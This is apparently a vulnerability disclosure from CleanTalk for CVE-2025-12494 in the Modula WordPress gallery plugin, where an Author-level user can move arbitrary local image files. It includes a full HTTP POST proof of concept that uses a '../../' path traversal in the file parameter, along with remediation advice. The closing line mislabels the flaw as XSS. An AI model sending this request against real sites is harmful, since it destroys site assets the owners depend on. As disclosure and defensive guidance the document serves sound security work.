Modula – Image Gallery (Photo Grid & Video Gallery) is a widely deployed WordPress gallery plugin (100k+ installs) used to build responsive image grids and media galleries. It includes an “import file” feature to bring images into the Media Library. During testing, we identified CVE-2025-12494, a high-impact improper authorization / unsafe file operation vulnerability: an Author+ user can supply a filesystem path to a local image and—when delete_files=true—cause WordPress’ media_handle_sideload() pipeline to move (not copy) that file into uploads, effectively removing the original asset from its source location. Because the endpoint does not enforce a base-directory allowlist (no realpath() prefix check), attackers can target application assets such as theme images, plugin graphics, or other local files readable/writable by PHP, resulting in content integrity loss and site destabilization.
| CVE | CVE-2025-12494 |
| Plugin Version | Image Gallery – Photo Grid & Video Gallery <= 2.12.28 |
| Critical | High |
| All Time | 5 475 776 |
| Active installations | 100 000+ |
| Publicly Published | November 14, 2025 |
| Last Updated | November 14, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12494 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modula-best-grid-gallery/image-gallery-photo-grid-video-gallery-21228-improper-authorization-to-authenticated-author-arbitrary-image-file-move |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| October 21, 2025 | Plugin testing and vulnerability detection in the Image Gallery – Photo Grid & Video Gallery have been completed |
| October 21, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 14, 2025 | Registered CVE-2025-12494 |
Discovery of the Vulnerability
The vulnerable AJAX action is modula_import_file (/wp-admin/admin-ajax.php). It accepts a file parameter that is treated as a local path and (when delete_files=true) routes it through media_handle_sideload(). In typical WordPress flows, “sideload” implies moving a temporary upload into wp-content/uploads/. Here, Modula accepts attacker-controlled paths without validating that the file originates from a safe import directory. There is no canonicalization/normalization check (realpath) ensuring the file resides within an approved base path. Authorization is limited to Author+ (via nonce + upload_files capability), which is insufficient given the destructive nature of moving files outside uploads.
Understanding of Missing Auth attack’s
In WordPress, endpoints that manipulate files must enforce both capability checks and object/path restrictions. Checking upload_files is appropriate for uploading new media, but it is not enough to allow arbitrary filesystem moves. A secure implementation would restrict imports to:
- files already inside
wp-content/uploads/, or - a dedicated plugin-controlled staging directory, or
- a strictly validated list of media IDs rather than raw paths.
Similar vulnerabilities have historically been abused to delete theme screenshots, break branding assets, remove plugin resources, or cause widespread “missing image” failures by moving files referenced by templates. Even if the attacker can only move image files, that can still disrupt site operation and require a restore from backups.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-12494, an attacker with Author+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/edit.php?post_type=modula-gallery Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 231 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: AUTHOR+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=modula_import_file&security=modulaGalleryUpload.security_from_http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=modula-gallery&post_ID=1402&file=../../wordpress/wp-content/uploads/2025/09/geeb68a8e868a1c0271d1d2bb555c1d3ab136300569fff3ae724cbfd2d7ccb70b2555870d879e74dae6f552ee5a503ce2_1920.png&delete_files=true____
Site defacement and visual disruption: Attackers can remove theme screenshots, logos, hero images, or gallery resources, causing broken pages and harming brand trust.
Operational instability: If critical image assets used by theme layout or admin previews are moved, site management workflows can break or become unreliable.
Persistent damage: The move operation is destructive; without backups, recovery may require manual file replacement or reinstallation of themes/plugins.
Insider abuse: Author roles are common on editorial sites—an attacker or disgruntled contributor can cause major disruption without admin access.
Recommendations for Improved Security
For plugin maintainers (Modula):
- Enforce strict base-path allowlist: Canonicalize with
realpath()and ensure the file is within a permitted directory (preferablywp_upload_dir()or a plugin staging folder). Reject anything outside. - Disallow traversal & absolute paths: Normalize and reject any
.., leading slashes, drive letters, or URL schemes. - Never “move” external assets: If importing from local paths is needed, copy the file (
copy()) rather than moving, or require explicit admin-only confirmation for destructive behavior. - Raise capability requirement: Restrict destructive import operations to admins (
manage_options) or a dedicated capability, not justupload_files. - Validate file type and existence safely: Confirm the file is an image and not a symlink; enforce size limits and safe extensions.
- Log sensitive actions: Record user ID, IP, source path, and destination for forensic response.
For site owners:
- Update immediately once a patch is released.
- Reduce access: avoid granting Author roles broadly if the plugin is used.
- Monitor admin-ajax activity for repeated
modula_import_filecalls and unexpected media spikes. - Ensure backups cover both
wp-content/uploadsand theme/plugin directories.
By taking proactive measures to address XSS vulnerabilities like CVE-2025-12494 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.